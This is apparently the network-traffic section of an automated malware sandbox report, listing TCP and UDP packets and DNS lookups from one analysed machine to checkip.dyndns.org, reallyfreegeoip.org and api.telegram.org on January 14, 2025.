Jan 14, 2025 14:14:06.500289917 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.500298023 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.500694990 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.545304060 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.552964926 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.595371008 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.676597118 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.676773071 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.676835060 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.682317019 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.700335979 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.705192089 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.724338055 CET	80	49735	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.725544930 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.725590944 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.725678921 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.725915909 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.725930929 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.779665947 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.910023928 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.991621017 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.991652966 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.991775036 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.992100954 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.992113113 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.029675007 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.186752081 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.189027071 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.189059019 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.336025000 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.336077929 CET	443	49741	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.336218119 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.336868048 CET	49741	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.339984894 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.341049910 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.345432997 CET	80	49735	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:07.345488071 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.346267939 CET	80	49748	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:07.346352100 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.346443892 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.351470947 CET	80	49748	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:07.468760014 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.470357895 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.470382929 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.627403021 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.627461910 CET	443	49742	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:07.627568960 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.628371000 CET	49742	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:07.631211996 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.633456945 CET	49749	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.636250019 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:07.636529922 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.638298988 CET	80	49749	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:07.638381958 CET	49749	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.638478994 CET	49749	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:07.643337011 CET	80	49749	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.031092882 CET	80	49748	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.032270908 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.032289982 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.032440901 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.032632113 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.032644987 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.076531887 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.330791950 CET	80	49749	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.332107067 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.332142115 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.332376003 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.332631111 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.332645893 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.373419046 CET	49749	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.486970901 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.494700909 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.494730949 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.631666899 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.631743908 CET	443	49756	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.631831884 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.632215023 CET	49756	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.635509014 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.636795044 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.640537024 CET	80	49748	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.640594959 CET	49748	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.641645908 CET	80	49758	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.641804934 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.641804934 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:08.646684885 CET	80	49758	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:08.807370901 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:08.813043118 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:08.813069105 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.006869078 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.006932020 CET	443	49757	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.007150888 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.007433891 CET	49757	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.011538029 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.016380072 CET	80	49764	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.016474962 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.016622066 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.021496058 CET	80	49764	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.322504044 CET	80	49758	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.323791981 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.323822021 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.324048042 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.324176073 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.324184895 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.373410940 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.694566965 CET	80	49764	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.695724010 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.695765972 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.695826054 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.696060896 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.696074009 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.748411894 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.774291039 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.775758982 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.775779009 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.913167953 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.913229942 CET	443	49765	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:09.913439989 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.913829088 CET	49765	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:09.916742086 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.917670012 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.921864033 CET	80	49758	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.921942949 CET	49758	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.922523975 CET	80	49772	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:09.922617912 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.922658920 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:09.927473068 CET	80	49772	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:10.156996012 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.158829927 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.158863068 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.300968885 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.301139116 CET	443	49771	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.301198959 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.301512957 CET	49771	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.305238962 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:10.306224108 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:10.310269117 CET	80	49764	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:10.310322046 CET	49764	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:10.311001062 CET	80	49777	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:10.311069965 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:10.311239958 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:10.315967083 CET	80	49777	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:10.602806091 CET	80	49772	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:10.604357004 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.604394913 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.604512930 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.604926109 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:10.604938984 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:10.654666901 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.004448891 CET	80	49777	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.006022930 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.006052017 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.006112099 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.006329060 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.006340981 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.045299053 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.082509995 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.084068060 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.084086895 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.232995033 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.233083010 CET	443	49779	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.233138084 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.233668089 CET	49779	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.245954990 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.247153044 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.251132965 CET	80	49772	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.251224041 CET	49772	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.252007961 CET	80	49786	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.252125025 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.252338886 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.257164955 CET	80	49786	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.464776993 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.466443062 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.466465950 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.613641024 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.613739014 CET	443	49784	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.613848925 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.614240885 CET	49784	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.618026972 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.619213104 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.623060942 CET	80	49777	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.623116970 CET	49777	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.624036074 CET	80	49787	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.624114990 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.624185085 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:11.629074097 CET	80	49787	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.924195051 CET	80	49786	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:11.925461054 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.925491095 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.925600052 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.925904989 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:11.925918102 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:11.967173100 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.312027931 CET	80	49787	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:12.313498020 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.313519001 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.313637972 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.313891888 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.313898087 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.357791901 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.381540060 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.383148909 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.383173943 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.521384954 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.521434069 CET	443	49793	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.521492958 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.521883965 CET	49793	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.537655115 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.544142962 CET	80	49786	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:12.544217110 CET	49786	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.546379089 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:12.546471119 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:12.546560049 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:12.546926975 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:12.546966076 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:12.772615910 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.774163008 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.774183035 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.902224064 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.902398109 CET	443	49794	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:12.902575016 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.907926083 CET	49794	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:12.911559105 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.912544012 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.916498899 CET	80	49787	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:12.916599035 CET	49787	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.917577028 CET	80	49801	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:12.917646885 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.917725086 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:12.923360109 CET	80	49801	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:13.178184986 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.178258896 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:13.180176020 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:13.180183887 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.180614948 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.186599970 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:13.227334023 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.415117979 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.415179014 CET	443	49799	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:13.415229082 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:13.419423103 CET	49799	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:13.618935108 CET	80	49801	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:13.620486975 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:13.620512009 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:13.620805025 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:13.621535063 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:13.621547937 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:13.670376062 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.093528986 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.097878933 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.097898960 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.244309902 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.244368076 CET	443	49808	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.244415045 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.244910955 CET	49808	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.250564098 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.251861095 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.255641937 CET	80	49801	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:14.255702019 CET	49801	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.256700039 CET	80	49816	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:14.256764889 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.256932020 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:14.261657000 CET	80	49816	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:14.930644989 CET	80	49816	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:14.932254076 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.932269096 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.933773041 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.933871984 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:14.933877945 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:14.982904911 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.391815901 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:15.393510103 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:15.393537998 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:15.543349981 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:15.543411016 CET	443	49822	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:15.545799017 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:15.545953035 CET	49822	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:15.548715115 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.549974918 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.553674936 CET	80	49816	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:15.553894043 CET	49816	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.554991961 CET	80	49827	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:15.555258989 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.555381060 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:15.560283899 CET	80	49827	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:16.236222029 CET	80	49827	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:16.237713099 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.237750053 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.237818956 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.238082886 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.238100052 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.279680014 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:16.700572014 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.717694998 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.717778921 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.835746050 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.835822105 CET	443	49831	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:16.835917950 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.836460114 CET	49831	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:16.848484993 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:16.849303961 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:16.849370003 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:16.849450111 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:16.849841118 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:16.849873066 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:16.856767893 CET	80	49827	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:16.856821060 CET	49827	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:17.483685017 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.483932018 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:17.485637903 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:17.485658884 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.486002922 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.487942934 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:17.535336018 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.738147974 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.738239050 CET	443	49836	149.154.167.220	192.168.2.6
Jan 14, 2025 14:14:17.740150928 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:17.758891106 CET	49836	443	192.168.2.6	149.154.167.220
Jan 14, 2025 14:14:28.167007923 CET	49717	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:32.272728920 CET	49749	80	192.168.2.6	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 14:14:00.633039951 CET	49957	53	192.168.2.6	1.1.1.1
Jan 14, 2025 14:14:00.642038107 CET	53	49957	1.1.1.1	192.168.2.6
Jan 14, 2025 14:14:01.705044031 CET	57491	53	192.168.2.6	1.1.1.1
Jan 14, 2025 14:14:01.712008953 CET	53	57491	1.1.1.1	192.168.2.6
Jan 14, 2025 14:14:12.537846088 CET	56772	53	192.168.2.6	1.1.1.1
Jan 14, 2025 14:14:12.545697927 CET	53	56772	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 14:14:00.633039951 CET	192.168.2.6	1.1.1.1	0x73d6	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.705044031 CET	192.168.2.6	1.1.1.1	0xa27f	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:12.537846088 CET	192.168.2.6	1.1.1.1	0x8e45	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
